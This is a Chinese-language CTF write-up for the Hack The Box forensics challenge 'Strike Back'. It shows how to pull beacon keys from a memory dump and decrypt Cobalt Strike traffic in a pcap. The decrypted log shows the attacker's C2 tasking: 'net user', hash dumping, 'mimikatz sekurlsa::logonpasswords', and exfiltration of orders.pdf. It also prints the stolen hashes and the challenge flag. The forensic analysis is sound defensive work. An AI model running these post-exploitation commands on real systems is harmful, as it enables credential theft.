从pcap包中解密cobalt-strike流量

介绍

本文内容来自于hackthebox的forensics challenge的Strike Back的题解方法

分析pcap流量包和freesteam.dmp文件

使用Wireshark打开capture.pcap文件,发现第4到第10个数据包是freesteam.exe通过HTTP协议被下载到受害者机器上,然后按顺序点击File > Export Objects > HTTP,会打开一个窗口让我们轻松的将freesteam.exe文件从capture.pcap数据包中提取出来。

1
2
3
┌──(root💀kali)-[~/hackthebox/challenge/forensics/Strike_Back]
└─# file freesteam.exe
freesteam.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

将freesteam.exe上传到VirusTotal在线网站上,显示它是Cobalt Strike的木马程序

pcap中有很多的HTTP流量,但被加密了,所以现在转移到.dmp文件了。如果使用file命令,可以看到这是一个MiniDuMP崩溃dump。

1
2
3
┌──(root💀kali)-[~/hackthebox/challenge/forensics/Strike_Back]
└─# file freesteam.dmp
freesteam.dmp: Mini DuMP crash report, 17 streams, Fri Nov 19 20:45:38 2021, 0x469925 type

通过使用radare2分析,可以确定这是一个freesteam.exe进程的dump。

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/challenge/forensics/Strike_Back]
└─# r2 freesteam.dmp
[WARN] Invalid or unsupported enumeration encountered 21
[WARN] Invalid or unsupported enumeration encountered 22
[INFO] Parsing data sections for large dumps can take time, please be patient (but if strings ain't your thing try with -z)!
[0x02dd0000]> iSq~exe
0x400000 0x409000 ---- C:\Users\npatrick\Downloads\freesteam.exe
0x400000 0x409000 ---- C:\Users\npatrick\Downloads\freesteam.exe

通过搜索”Cobalt Strike memory dump”的变化,可以看到,它可能从freesteam.dmp的流量派生一个解密key,然后将该key应用到pcap文件。

解密cs流量

从dump中提取密钥的方法会因cobalt strike beacon的版本而有所不同。在版本3中,key的前面是一组元数据字符串,除了false positives外,可以很容易提取。这种方法在这个例子中无效,所以假设这个example来自版本4。在本example中,提供了加密的callback,并且可以使用Didier Stevens编写的脚本来测试dump中针对该callback的所有可能的key。一旦成功,它将打印key,然后就可以解密流量了。Stevens的这篇blog详细介绍了这种方法:

  • Quickpost: Decrypting Cobalt Strike Traffic

从76号数据包得到了加密callback, POST /submit.php?id=1909272864 HTTP/1.1。然后使用memory dump提取AES和HMAC key:

1
00000040317639faf73648274ba8a66d11182283f7fa26fe44b3982a36d80f6ffba4949e5ec759fffb372775d2ac002425547a11ddf2e05c2cb914e09ac033f01db0b60c

解密脚本github地址:

  • Beta
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~/hackthebox/challenge/forensics/Strike_Back]
└─# python3 /root/Beta/cs-extract-key.py -c 00000040317639faf73648274ba8a66d11182283f7fa26fe44b3982a36d80f6ffba4949e5ec759fffb372775d2ac002425547a11ddf2e05c2cb914e09ac033f01db0b60c freesteam.dmp
File: freesteam.dmp
Searching for AES and HMAC keys
Searching after sha256\x00 string (0x4048a)
AES key position: 0x00447f81
AES Key: 3ae7f995a2392c86e3fa8b6fbc3d953a
HMAC key position: 0x0044b2a1
HMAC Key: bf2d35c0e9b64bc46e6d513c1d0f6ffe
SHA256 raw key: bf2d35c0e9b64bc46e6d513c1d0f6ffe:3ae7f995a2392c86e3fa8b6fbc3d953a
Searching for raw key
Searching after sha256\x00 string (0x441a49)
AES key position: 0x00447f81
AES Key: 3ae7f995a2392c86e3fa8b6fbc3d953a
HMAC key position: 0x0044b2a1
HMAC Key: bf2d35c0e9b64bc46e6d513c1d0f6ffe
Searching for raw key

为了解密实际的pcap数据包,必须使用HMAC和AES key与另一个脚本,以获得以下结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
┌──(root💀kali)-[~/hackthebox/challenge/forensics/Strike_Back]
└─# python3 /root/Beta/cs-parse-http-traffic.py -k bf2d35c0e9b64bc46e6d513c1d0f6ffe:3ae7f995a2392c86e3fa8b6fbc3d953a capture.pcap -e
Packet number: 12
HTTP response (for request 7 GET)
Length raw data: 14336
HMAC signature invalid
Packet number: 47
HTTP response (for request 23 GET)
Length raw data: 206401
HMAC signature invalid
Packet number: 69
HTTP response (for request 66 GET)
Length raw data: 48
Timestamp: 1637354721 20211119-204521
Data size: 8
Command: 27 GETUID
Arguments length: 0

Packet number: 76
HTTP request POST
http://192.168.1.9/submit.php?id=1909272864
Length raw data: 68
Counter: 2
Callback: 16 BEACON_GETUID
b'WS02\\npatrick (admin)'

Packet number: 101
HTTP response (for request 86 GET)
Length raw data: 87648
Timestamp: 1637354781 20211119-204621
Data size: 87608
Command: 89 UNKNOWN
Arguments length: 87552
b'MZ\xe8\x00\x00\x00\x00[REU\x89\xe5\x81\xc3)\x1f\x00\x00\xff\xd3\x89\xc3Wh\x04\x00\x00\x00P\xff\xd0
MD5: 1e4b88220d370c6bc55e213761f7b5ac
Command: 40 UNKNOWN
Arguments length: 40
Unknown1: 0
Unknown2: 1602864
Pipename: b'\\\\.\\pipe\\8e09448'
Command: b'net user'
b''

Packet number: 109
HTTP request POST
http://192.168.1.9/submit.php?id=1909272864
Length raw data: 724
Counter: 3
Callback: 24 BEACON_OUTPUT_NET
b"Account information for npatrick on \\\\localhost:\n\nUser name npatrick\nFull Name npatrick\nComment Fleet Commander\nUser's Comment \nCountry code 0\nAccount active Yes\nAccount expires Never\nAccount type Admin\n\nPassword last set 221 hours ago\nPassword expires Yes\nPassword changeable Yes\nPassword required Yes\nUser may change password Yes\n\nWorkstations allowed \nLogon script \nUser profile \nHome directory \nLast logon 11/19/2021 12:41:23\n"

Packet number: 135
HTTP response (for request 119 GET)
Length raw data: 82528
Timestamp: 1637354843 20211119-204723
Data size: 82501
Command: 44 UNKNOWN
Arguments length: 82432
b'MZARUH\x89\xe5H\x81\xec \x00\x00\x00H\x8d\x1d\xea\xff\xff\xffH\x81\xc3T\x16\x00\x00\xff\xd3H\x89\x
MD5: 851cbc5a118178f5c548e573a719d221
Command: 40 UNKNOWN
Arguments length: 53
Unknown1: 0
Unknown2: 1391256
Pipename: b'\\\\.\\pipe\\8a4f8bc8'
Command: b'dump password hashes'
b''

Packet number: 143
HTTP request POST
http://192.168.1.9/submit.php?id=1909272864
Length raw data: 548
Counter: 4
Callback: 21 BEACON_OUTPUT_HASHES
b'Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nJohn Doe:1001:aad3b435b51404eeaad3b435b51404ee:37fbc1731f66ad4e524160a732410f9d:::\nnpatrick:1002:aad3b435b51404eeaad3b435b51404ee:3c7c8387d364a9c973dc51a235a1d0c8:::\nWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:c81c8295ec4bfa3c9b90dcd6c64727e2:::\n'

Packet number: 190
HTTP response (for request 153 GET)
Length raw data: 438896
Timestamp: 1637354904 20211119-204824
Data size: 438866
Command: 44 UNKNOWN
Arguments length: 438784
b'MZARUH\x89\xe5H\x81\xec \x00\x00\x00H\x8d\x1d\xea\xff\xff\xffH\x81\xc3\xb8\x87\x00\x00\xff\xd3H\x8
MD5: b0cfbef2bd9a171b3f48e088b8ae2a99
Command: 40 UNKNOWN
Arguments length: 66
Unknown1: 0
Unknown2: 2112152
Pipename: b'\\\\.\\pipe\\673dd5c0'
Command: b'mimikatz sekurlsa::logonpasswords'
b''

Packet number: 204
HTTP request POST
http://192.168.1.9/submit.php?id=1909272864
Length raw data: 4516
Counter: 5
Callback: 32 UNKNOWN

Authentication Id : 0 ; 334782 (00000000:00051bbe)
Session : Interactive from 1
User Name : npatrick
Domain : WS02
Logon Server : WS02
Logon Time : 11/19/2021 12:40:19 PM
SID : S-1-5-21-3301052303-2181805973-2384618940-1002
msv :
[00000003] Primary
* Username : npatrick
* Domain : .
* NTLM : 3c7c8387d364a9c973dc51a235a1d0c8
* SHA1 : 44cb46af6b1e8c5873bee400115d1694e650c5b4
tspkg :
wdigest :
* Username : npatrick
* Domain : WS02
* Password : (null)
kerberos :
* Username : npatrick
* Domain : WS02
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 334736 (00000000:00051b90)
Session : Interactive from 1
User Name : npatrick
Domain : WS02
Logon Server : WS02
Logon Time : 11/19/2021 12:40:19 PM
SID : S-1-5-21-3301052303-2181805973-2384618940-1002
msv :
[00000003] Primary
* Username : npatrick
* Domain : .
* NTLM : 3c7c8387d364a9c973dc51a235a1d0c8
* SHA1 : 44cb46af6b1e8c5873bee400115d1694e650c5b4
tspkg :
wdigest :
* Username : npatrick
* Domain : WS02
* Password : (null)
kerberos :
* Username : npatrick
* Domain : WS02
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 46420 (00000000:0000b554)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WS02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 46226 (00000000:0000b492)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WS02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WS02$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : WS02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : ws02$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 26445 (00000000:0000674d)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID : S-1-5-96-0-0
msv :
tspkg :
wdigest :
* Username : WS02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 26411 (00000000:0000672b)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID : S-1-5-96-0-1
msv :
tspkg :
wdigest :
* Username : WS02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 25289 (00000000:000062c9)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WS02$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 11/19/2021 12:40:12 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WS02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : ws02$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Extra packet data: b'\x00\x00\x00'

Packet number: 217
HTTP response (for request 214 GET)
Length raw data: 80
Timestamp: 1637354965 20211119-204925
Data size: 43
Command: 53 LIST_FILES
Arguments length: 35
b'\xff\xff\xff\xfe\x00\x00\x00\x1bC:\\Users\\npatrick\\Desktop\\*'
MD5: 2211925feba04566b12e81807ff9c0b4

Packet number: 224
HTTP request POST
http://192.168.1.9/submit.php?id=1909272864
Length raw data: 324
Counter: 6
Callback: 22 TODO
b'\xff\xff\xff\xfe'
----------------------------------------------------------------------------------------------------
C:\Users\npatrick\Desktop\*
D 0 11/19/2021 12:24:08 .
D 0 11/19/2021 12:24:08 ..
F 5175 11/11/2021 03:24:13 cheap_spare_parts_for_old_blimps.docx
F 282 11/10/2021 07:02:24 desktop.ini
F 24704 11/11/2021 03:22:16 gogglestown_citizens_osint.xlsx
F 62393 11/19/2021 12:24:10 orders.pdf

----------------------------------------------------------------------------------------------------

Packet number: 237
HTTP response (for request 234 GET)
Length raw data: 80
Timestamp: 1637355025 20211119-205025
Data size: 44
Command: 11 DOWNLOAD
Arguments length: 36
b'C:\\Users\\npatrick\\Desktop\\orders.pdf'
MD5: b25952a4fd6a97bac3ccc8f2c01b906b

Packet number: 254
HTTP request POST
http://192.168.1.9/submit.php?id=1909272864
Length raw data: 62572
Counter: 7
Callback: 2 DOWNLOAD_START
parameter1: 0
length: 62393
filenameDownload: C:\Users\npatrick\Desktop\orders.pdf

Counter: 8
Callback: 8 DOWNLOAD_WRITE
Length: 62393
MD5: 00f542efefccd7a89a55c133180d8581

Counter: 9
Callback: 9 DOWNLOAD_COMPLETE
b'\x00\x00\x00\x00'


Commands summary:
11 DOWNLOAD: 1
27 GETUID: 1
40 UNKNOWN: 3
44 UNKNOWN: 2
53 LIST_FILES: 1
89 UNKNOWN: 1

Callbacks summary:
2 DOWNLOAD_START: 1
8 DOWNLOAD_WRITE: 1
9 DOWNLOAD_COMPLETE: 1
16 BEACON_GETUID: 1
21 BEACON_OUTPUT_HASHES: 1
22 TODO: 1
24 BEACON_OUTPUT_NET: 1
32 UNKNOWN: 1

使用”–help”运行解密脚本,使用-e参数可以将文件解压缩到磁盘。通过这个命令,会打印出相同的结果,但同时还向当前目录添加了几个.vir文件。file命令显示有几个DLL文件、一个ASCII文本文件和一个pdf文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root💀kali)-[~/hackthebox/challenge/forensics/Strike_Back]
└─# ls
capture.pcap payload-00f542efefccd7a89a55c133180d8581.vir payload-851cbc5a118178f5c548e573a719d221.vir
freesteam.dmp payload-1e4b88220d370c6bc55e213761f7b5ac.vir payload-b0cfbef2bd9a171b3f48e088b8ae2a99.vir
freesteam.exe payload-2211925feba04566b12e81807ff9c0b4.vir payload-b25952a4fd6a97bac3ccc8f2c01b906b.vir

┌──(root💀kali)-[~/hackthebox/challenge/forensics/Strike_Back]
└─# file *.vir
payload-00f542efefccd7a89a55c133180d8581.vir: PDF document, version 1.4, 1 pages
payload-1e4b88220d370c6bc55e213761f7b5ac.vir: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
payload-851cbc5a118178f5c548e573a719d221.vir: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
payload-2211925feba04566b12e81807ff9c0b4.vir: data
payload-b0cfbef2bd9a171b3f48e088b8ae2a99.vir: MS-DOS executable PE32+ executable (DLL) (console) x86-64, for MS Windows
payload-b25952a4fd6a97bac3ccc8f2c01b906b.vir: ASCII text, with no line terminators

得到flag,cs流量解密成功:

1
HTB{Th4nk_g0d_y0u_f0und_1t_0n_T1m3!!!!}